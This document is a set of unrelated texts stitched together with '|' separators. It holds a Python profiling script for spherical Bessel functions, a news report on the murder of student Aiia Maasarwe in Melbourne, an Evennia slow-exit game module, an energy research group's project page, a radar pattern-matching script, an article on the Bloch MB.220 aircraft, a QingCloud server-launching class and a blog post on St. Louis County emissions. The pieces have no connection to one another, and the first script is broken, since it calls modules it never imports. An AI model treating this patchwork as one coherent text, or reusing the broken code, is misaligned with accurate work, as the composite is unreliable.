from os import path
import numpy as np
# Path hack
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
def profile(f, args):
"""Profile the sbf function f."""
z = 10**np.linspace(-3, 4, 1000)
n = np.arange(200)
zz, nn = np.meshgrid(z, n)
fnames = get_input_filenames(args)
cProfile.runctx("f(nn, zz)", globals(), locals(), fnames[0])
phases = np.exp(2j*np.pi*np.random.rand(zz.shape[0], zz.shape[1]))
zz = zz*phases
cProfile.runctx("f(nn, zz)", globals(), locals(), fnames[1])
def get_input_filenames(args):
return ("{}_{}_real.pstats".format(args.sbf, args.algo),
"{}_{}_complex.pstats".format(args.sbf, args.algo))
def get_output_filenames(args):
return ("{}_{}_real.txt".format(args.sbf, args.algo),
"{}_{}_complex.txt".format(args.sbf, args.algo))
def print_stats(args):
f_ins = get_input_filenames(args)
f_outs = get_output_filenames(args)
for f_in, f_out in zip(f_ins, f_outs):
with open(f_out, "w") as f:
p = pstats.Stats(f_in, stream=f)
p.strip_dirs().sort_stats("cumulative").print_stats(50)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("sbf",
help="The spherical Bessel function to profile.",
choices=["jn", "yn", "h1n", "h2n", "i1n", "i2n", "kn"])
parser.add_argument("algo",
help="The implementation to profile.",
choices=["default", "bessel", "a_recur", "cai",
"power_series", "d_recur_miller",
"candidate"])
args = parser.parse_args()
m = importlib.import_module("algos.{}".format(args.algo))
f = getattr(m, "sph_{}".format(args.sbf))
profile(f, args)
print_stats(args)
|
Security around La Trobe University's Bundoora campus has been increased and police are "saturating" the area after Israeli student Aiia Maasarwe was brutally murdered on Wednesday morning, but the victim's family says police aren't doing enough.
The expression of grief comes as the person responsible remains on the run.
It's been three days since the 21-year-old's body was found a short walk from a tram stop and not far from the safety of the campus where she lived.
Ms Maasarwe was attacked at about 12.10am, less than a kilometre from her home. Her body was dumped in shrubs near a shopping centre and discovered by workers early on Wednesday morning.
The few clues police have so far shared suggest Ms Maasarwe was stalked from the No. 86 tram by a man who raped and murdered her. He then discarded clothes, including a black hat and a black and grey T-shirt.
As the hunt escalates, a vigil is being planned for Ms Maasarwe tonight. Mourners will gather on the steps of Melbourne's Parliament House to remember the young woman whose life was taken too soon and to protest against another senseless, violent attack on a woman walking home.
Police are hunting for the man who murdered Israeli student Aiia Maasarwe.
Homicide detectives are releasing CCTV images of Ms Maasarwe from Tuesday night.
Before she was murdered, Ms Maasarwe had attended a comedy show in North Melbourne.
Detectives say it is likely Ms Maasarwe had been travelling on the route 86 tram from Docklands.
A hat left near the victim’s body.
A grey and black T-shirt found at Bundoora.
|
"""
Slow Exit typeclass
Contribution - Griatch 2014
This is an example of an Exit-type that delays its traversal. This
simulates slow movement, common in many different types of games. The
contrib also contains two commands, CmdSetSpeed and CmdStop for changing
the movement speed and abort an ongoing traversal, respectively.
To try out an exit of this type, you could connect two existing rooms
using something like this:
@open north:contrib.slow_exit.SlowExit = <destination>
Installation:
To make all new exits of this type, add the following line to your
settings:
BASE_EXIT_TYPECLASS = "contrib.slow_exit.SlowExit"
To get the ability to change your speed and abort your movement,
simply import and add CmdSetSpeed and CmdStop from this module to your
default cmdset (see tutorials on how to do this if you are unsure).
Notes:
This implementation is efficient but not persistent; so incomplete
movement will be lost in a server reload. This is acceptable for most
game types - to simulate longer travel times (more than the couple of
seconds assumed here), a more persistent variant using Scripts or the
TickerHandler might be better.
"""
from evennia import DefaultExit, utils, Command
MOVE_DELAY = {"stroll": 6,
"walk": 4,
"run": 2,
"sprint": 1}
class SlowExit(DefaultExit):
"""
This overloads the way moving happens.
"""
def at_traverse(self, traversing_object, target_location):
"""
Implements the actual traversal, using utils.delay to delay the move_to.
"""
# if the traverser has an Attribute move_speed, use that,
# otherwise default to "walk" speed
move_speed = traversing_object.db.move_speed or "walk"
move_delay = MOVE_DELAY.get(move_speed, 4)
def move_callback():
"This callback will be called by utils.delay after move_delay seconds."
source_location = traversing_object.location
if traversing_object.move_to(target_location):
self.at_after_traverse(traversing_object, source_location)
else:
if self.db.err_traverse:
# if exit has a better error message, let's use it.
self.caller.msg(self.db.err_traverse)
else:
# No shorthand error message. Call hook.
self.at_failed_traverse(traversing_object)
traversing_object.msg("You start moving %s at a %s." % (self.key, move_speed))
# create a delayed movement
deferred = utils.delay(move_delay, callback=move_callback)
# we store the deferred on the character, this will allow us
# to abort the movement. We must use an ndb here since
# deferreds cannot be pickled.
traversing_object.ndb.currently_moving = deferred
#
# set speed - command
#
SPEED_DESCS = {"stroll": "strolling",
"walk": "walking",
"run": "running",
"sprint": "sprinting"}
class CmdSetSpeed(Command):
"""
set your movement speed
Usage:
setspeed stroll|walk|run|sprint
This will set your movement speed, determining how long
it takes to traverse exits. If no speed is set, 'walk' speed
is assumed.
"""
key = "setspeed"
def func(self):
"""
Simply sets an Attribute used by the SlowExit above.
"""
speed = self.args.lower().strip()
if speed not in SPEED_DESCS:
self.caller.msg("Usage: setspeed stroll|walk|run|sprint")
elif self.caller.db.move_speed == speed:
self.caller.msg("You are already %s." % SPEED_DESCS[speed])
else:
self.caller.db.move_speed = speed
self.caller.msg("You are now %s." % SPEED_DESCS[speed])
#
# stop moving - command
#
class CmdStop(Command):
"""
stop moving
Usage:
stop
Stops the current movement, if any.
"""
key = "stop"
def func(self):
"""
This is a very simple command, using the
stored deferred from the exit traversal above.
"""
currently_moving = self.caller.ndb.currently_moving
if currently_moving:
currently_moving.cancel()
self.caller.msg("You stop moving.")
else:
self.caller.msg("You are not moving.")
|
Our research focuses on building tools to reduce the environmental impacts of energy systems, with an emphasis on greenhouse gas emissions (GHGs) from fossil energy systems. Our research methods include engineering-based life cycle assessment (LCA) modeling and computational optimization. Our research targets include transportation fuels (conventional oil and oil substitutes) and carbon dioxide capture and storage.
We study leakage from the natural gas system, with a focus on comprehensive assessment of leakage mechanisms, as well as ongoing work on detecting leakage from natural gas systems.
OPGEE is a bottom-up LCA tool that allows the user to estimate GHG emissions from oil and gas production operations under a variety of conditions and production technologies.
Optimization is used to choose technology configurations, designs, and operating conditions to achieve goals such as reduced cost and environmental impacts. Our group has applied optimization to carbon dioxide capture technologies and transportation fuels.
Life cycle assessment (LCA) is used to generate comprehensive measures of environmental impacts from producing a fuel, a product or a service. Our group builds LCA models of energy technologies.
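As a toy illustration of the bottom-up accounting an LCA model performs, per-stage emission intensities can be summed into a life-cycle total. Stage names and numbers here are invented placeholders, not outputs of any of the models described on this page:

```python
# Illustrative placeholder values, in gCO2e per MJ of fuel delivered.
STAGES = {
    "extraction": 8.0,
    "refining": 12.0,
    "transport": 1.5,
    "combustion": 73.0,
}

def life_cycle_intensity(stages):
    """Sum per-stage intensities into a well-to-wheels total."""
    return sum(stages.values())

print(life_cycle_intensity(STAGES))  # 94.5
```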
The depletion of conventional energy resources has led to the development of fossil-based substitutes for oil such as oil shale, tar sands, and coal- and natural gas-based synthetic fuels. We examine the nature of resource depletion and the dynamics of these transitions.
Could the need for conventional oil decline more rapidly than expected, reducing concerns about geologic constraints to oil production? In this study, we examine the possibilities for oil depletion mitigation from demand reduction, efficiency improvements, and substitution of non-liquid and liquid fuels for conventional oil.
The FEAST model simulates the processes that cause natural gas system leaks to be created and fixed, allowing for assessment of different leak detection and repair technologies.
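A caricature of the process FEAST simulates: leaks appear over time and are cleared at periodic surveys, so with a constant creation rate the open-leak count grows linearly between surveys and its time average is rate x interval / 2. This is a deliberate simplification for illustration, not the FEAST model itself:

```python
def average_open_leaks(creation_rate_per_yr, survey_interval_yr):
    # Leaks accumulate from 0 to rate*T between surveys that repair
    # everything found, so the time-averaged open count is rate*T/2.
    return creation_rate_per_yr * survey_interval_yr / 2.0

# Surveying twice as often halves the average number of open leaks.
print(average_open_leaks(10.0, 1.0))  # 5.0
print(average_open_leaks(10.0, 0.5))  # 2.5
```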
GHGfrack is an open-source engineering-based model to estimate greenhouse gas emissions from drilling and hydraulic fracturing operations.
|
#################
# code for testing armor.patternMatching.pipeline and armor.patternMatching.algorithms
import time
import shutil
import os
time0 = time.time()
startTime =time.asctime()
from armor import defaultParameters as dp
from armor import misc
from armor import pattern, pattern2
from armor.patternMatching import pipeline as pp, algorithms
from armor.filter import filters
kongreyDSS = pattern2.kongreyDSS
hualien4 = misc.getFourCorners(dp.hualienCounty)
yilan4 = misc.getFourCorners(dp.yilanCounty)
kaohsiung4 = misc.getFourCorners(dp.kaohsiungCounty)
taipei4 = misc.getFourCorners(dp.taipeiCounty)
taitung4 = misc.getFourCorners(dp.taitungCounty)
regions = [{'name': "hualien", 'points': hualien4, 'weight': 0.25},    # equal weights: Yilan and Taipei are smaller but are visited by typhoons more
           # {'name': "kaohsiung", 'points': kaohsiung4, 'weight': 0.3},  # commented out: it sits on the west coast and we want the window not to cross the central mountainous regions
           {'name': "taipei", 'points': taipei4, 'weight': 0.25},
           {'name': "taitung", 'points': taitung4, 'weight': 0.25},
           {'name': "yilan", 'points': yilan4, 'weight': 0.25},        # weights need not sum to 1
           ]
regionsString = "_".join([v['name']+str(round(v['weight'],2)) for v in regions])
outputFolder = dp.defaultRootFolder + "labReports/2014-03-07-filter-matching-scoring-pipeline/"+regionsString +'/'
### next up: work on the i/o so that i don't need to exit/re-enter ipython every time
# for loop added 18-03-2014
dss = kongreyDSS
obs = dss.obs
#obs.list = [v for v in obs if "00" in v.dataTime and v.dataTime>="20130828.0010"] # trim it down
obs.list = [v for v in obs if "00" in v.dataTime and (not ".00" in v.dataTime) and v.dataTime>="20130829.1800"] # trim it down
if not os.path.exists(outputFolder):
os.makedirs(outputFolder)
shutil.copyfile(dp.defaultRootFolder+"python/armor/start3.py", outputFolder+"start3.py")
for a in obs:
    # obsTime = "20130829.1800"
    # kongreyDSS.load()  # reload
    dss.unload()
    obsTime = a.dataTime
    pp.pipeline(dss=kongreyDSS,
                filteringAlgorithm=filters.gaussianFilter,
                filteringAlgorithmArgs={'sigma': 5,
                                        'stream_key': "wrfs"},
                matchingAlgorithm=algorithms.nonstandardKernel,
                matchingAlgorithmArgs={'obsTime': obsTime, 'maxHourDiff': 7,
                                       'regions': regions,
                                       'k': 24,  # steps of semi-Lagrangian advection performed
                                       'shiibaArgs': {'searchWindowWidth': 11, 'searchWindowHeight': 11},
                                       'outputFolder': outputFolder,
                                       },
                outputFolder=outputFolder,
                toLoad=False,
                # remarks="Covariance used, rather than correlation: algorithms.py line 221: tempScore = a1.cov(w1)[0,1]",
                remarks="Correlation used",
                )
print('start time:', startTime)
print('total time spent:', time.time() - time0)
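For reference, the dataTime filter used to trim obs.list near the top of this script can be expressed as a standalone predicate. The string tests keep on-the-hour frames (minutes "00") while excluding the 00 hour (matched by ".00"), from 2013-08-29 18:00 onward:

```python
def keep_frame(dataTime):
    """Standalone version of the obs.list filter above (illustrative).
    dataTime is a "YYYYMMDD.HHMM" string."""
    return ("00" in dataTime
            and ".00" not in dataTime
            and dataTime >= "20130829.1800")
```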
|
The Bloch MB.220 began life for the French as a passenger-hauler before being requisitioned into military service for the French Air Force during World War 2.
Unless otherwise noted, the statistics presented below pertain to the Bloch MB.220 model. Common measurements, and their respective conversions, are shown when possible.
ENGINE: 2 x Gnome-Rhone 14N-16/17 air-cooled radial piston engines developing 985 horsepower each.
• MB.220 - Base Series Designation; 1 prototype and 16 production models completed.
• MB.221 - Five post-World War 2 examples re-engined with Wright R-1820-97 Cyclone engines.
Detailing the development and operational history of the Bloch MB.220 Passenger Airliner / Military Transport Aircraft. Entry last updated on 1/14/2019. Authored by Staff Writer. Content ©www.MilitaryFactory.com.
Marcel Bloch founded Societe des Avions Marcel Bloch in 1928 (today better known as "Dassault"). The concern became a major aero-industry player for the nation of France throughout the 1930s and into the lead-up to World War 2 (1939-1945). One of its pre-war developments - to see service in the conflict - became the Bloch MB.220.
The MB.220 was conceived as a twin-engine passenger transport (airliner). Its appearance was consistent with the period: low-set monoplane wings, a short nose ahead of the cockpit, and a single-finned tail unit, all riding on a tail-dragger undercarriage. For power, the company partnered with Gnome-Rhone and installed its 14N series air-cooled radial piston engines of 985 horsepower each, one held in a nacelle on each wing. Beyond the flight crew of four (including two pilots), the aircraft could carry up to sixteen occupants.
Dimensionally, the MB.220 featured a length of 63 feet (19.2 meters) and a wingspan of 74.1 feet (22.6 meters). Its empty weight was 15,000 lb (6,800 kg) against a Maximum Take-Off Weight (MTOW) of 20,945 lb (9,500 kg). Performance included a maximum speed of 205 miles per hour (330 km/h), a range out to 870 miles (1,400 km), and a service ceiling of 23,000 feet (7,000 meters).
The prototype made its first flight in December of 1935. Air France became the launch customer, and sixteen production-quality models followed, with service introduction in 1938. With the arrival of war in 1939, the series was adopted by the French Air Force as basic transports, though the seventeen airframes mentioned were all that were ever completed; use of this stock fell between Free French, Vichy French, and German forces over their time in the air.
Before the end, a small collection of five was all that was left. In the post-war period, this lot was re-engined to take the American Wright R-1820-97 "Cyclone" engine instead and redesignated as the MB.221. Beyond that, the series fell to aviation history in the years following.
|
import gevent
from qingcloud.iaas import connect_to_zone
from Brick.sockserver import SockClient
from base import ServiceBase
class QingService(ServiceBase):
port = 42424
def __init__(self, s_id, conf,
api_keypath, zone, image, keypair, vxnets):
super(QingService, self).__init__(s_id, conf)
with open(api_keypath) as f:
self.api_id = f.readline().split()[1].strip("'")
self.api_key = f.readline().split()[1].strip("'")
self.zone = zone
self.image = image
self.keypair = keypair
self.instance_id = None
self.vxnets = vxnets
self.host = None
    def wait_booting(self, conn):
        """Poll the zone API every 3 seconds until the instance reports
        status "running" and has been assigned a private IP, then return
        its description dict."""
        inst = conn.describe_instances(instances=self.instance_id)["instance_set"][0]
        if inst["status"] != "running":
            gevent.sleep(3)
            return self.wait_booting(conn)
        elif not inst["vxnets"][0]["private_ip"]:
            gevent.sleep(3)
            return self.wait_booting(conn)
        else:
            return inst
def conn_puppet(self):
self.puppet = SockClient((self.host, self.port), keep_alive=False)
self.puppet.hire_worker()
def real_start(self):
conn = connect_to_zone(self.zone, self.api_id, self.api_key)
ret = conn.run_instances(image_id=self.image,
instance_type=self.conf,
login_mode="keypair",
login_keypair=self.keypair,
vxnets=[self.vxnets])
self.instance_id = ret["instances"]
ret = self.wait_booting(conn)
self.host = ret["vxnets"][0]["private_ip"]
self.conn_puppet()
def real_terminate(self):
self.puppet.fire_worker()
self.puppet.shutdown()
conn = connect_to_zone(self.zone, self.api_id, self.api_key)
conn.terminate_instances(self.instance_id)
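The two readline().split()[1].strip("'") calls in __init__ imply a key file of roughly the form sketched below (the exact field names are an assumption, modeled on the QingCloud CLI config style); the parsing can be exercised in isolation:

```python
import io

def parse_api_keyfile(f):
    # Mirrors QingService.__init__: each line is "<name>: '<value>'";
    # take the second whitespace-separated token and drop the quotes.
    api_id = f.readline().split()[1].strip("'")
    api_key = f.readline().split()[1].strip("'")
    return api_id, api_key

sample = io.StringIO(
    "qy_access_key_id: 'EXAMPLEKEYID'\n"       # field names assumed
    "qy_secret_access_key: 'EXAMPLESECRET'\n"
)
creds = parse_api_keyfile(sample)
```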
|
St. Louis County is a suburban county that rings the City of St. Louis on the north, west, and south, but does not include it. It includes more than 100 municipalities, some with tens of thousands of residents, others as small as a couple of blocks, and it also administers unincorporated area. St. Louis County published its Greenhouse Gas inventory in 2009, using 2008 as its baseline year.
Total community emissions for St. Louis County in 2008 were 23,520,171 MTCO2e. The report states that population was 994,098, yielding an estimate of 23.66 MTCO2e per capita. The first graph on the right shows community emissions by sector. Emissions caused by transportation were the largest source, accounting for 38% of total emissions. Almost all of it came from cars and trucks; only a tiny fraction, barely visible on the graph at right, came from the Metro Transit system. Commercial buildings emitted 27% of the total, while residential buildings emitted 26%. Most GHG inventories that I have seen do not construct an emission total for the built environment. It is, however, one of the largest sources of GHG emissions, and it is one of the sectors where energy efficiency, and hence GHG reduction, is least difficult. In this inventory, and in most of the others we have examined, the emissions from the commercial and residential sectors come from buildings, and the sectors can be summed to estimate emissions from the built environment. In St. Louis County, the commercial and residential sectors sum to 53% of total emissions.
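The headline figures in the paragraph above can be checked directly:

```python
total_mtco2e = 23_520_171   # 2008 community emissions, MTCO2e
population = 994_098
per_capita = total_mtco2e / population          # ~23.66, as reported

# Built-environment share = commercial + residential sectors:
built_environment = 0.27 + 0.26                 # 0.53, i.e. 53%
```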
Electricity was the largest source of GHG emissions in St. Louis County in 2008, accounting for 48% of total community emissions. It was followed by transportation fuels (gasoline & diesel), which together accounted for 38%. The inventory estimated that there were slightly more than 403,000 households in the county. Given that many of them use natural gas for heating, hot water, and/or cooking, it is remarkable that natural gas accounted for only 12% of emissions.
St. Louis County studied government emissions and energy costs in 2008, but did not report energy consumption. Not all departments reported their energy costs, so the estimates represent a lower limit, and actual costs were most likely somewhat higher. Looking at emissions by sector, buildings and facilities emitted by far the largest amount of GHG, more than four times as much as the next largest sector, vehicle fleet. However, as we have seen in some other inventories, the disparity in cost between buildings and fleet was not as great as the disparity in emissions. I believe that the reason for this pattern has to do with the energy sources used by the two sectors. Buildings tend to consume a lot of electricity, which is relatively inexpensive, but which tends to release a lot of GHG per unit of energy. Fleet, on the other hand, uses gasoline and diesel, which are more expensive, but less GHG intense.
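A rough back-of-the-envelope comparison supports that reasoning. The figures below are assumptions for illustration, not numbers from the inventory: the gasoline combustion factor of about 8.9 kg CO2 per gallon is a standard value, while the grid factor and both prices are assumed round numbers.

```python
ELEC_KG_PER_KWH = 0.8      # assumed coal-heavy grid factor, kg CO2e per kWh
ELEC_USD_PER_KWH = 0.08    # assumed retail electricity price
GAS_KG_PER_GAL = 8.9       # ~standard gasoline combustion factor
GAS_USD_PER_GAL = 3.0      # assumed pump price

elec_kg_per_dollar = ELEC_KG_PER_KWH / ELEC_USD_PER_KWH   # 10.0
gas_kg_per_dollar = GAS_KG_PER_GAL / GAS_USD_PER_GAL      # ~3.0
# A dollar spent on electricity buys several times more CO2e than a
# dollar spent on gasoline, which is why building emissions can dwarf
# fleet emissions while the cost gap stays much smaller.
```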
In terms of sources, electricity accounted for 64% of St. Louis County’s GHG emissions. Together, transportation fuels (gasoline, diesel, and LPG) accounted for about 27% of emissions. However, almost all of the transportation emissions were from gasoline, with diesel and LPG accounting for very small fractions. The implication is that virtually all of St. Louis County’s vehicle emissions come from cars operated by county personnel, and very little comes from large trucks or off-road equipment. The graph at right shows that police vehicles were the largest source of vehicle emissions. This matches findings from some other GHG inventories, for instance Creve Coeur, although the reports seldom present the data in a form that supports this analysis.
I am no longer able to find the St. Louis County Greenhouse Gas Emissions Inventory Baseline on the St. Louis County website. A summary of some of the information is available at http://green.stlouisco.com/GreenhouseGasInventory. Those needing a copy are welcome to contact me by leaving a comment here on the blog.
By mogreenstats in Climate Change on 2013/02/04.
|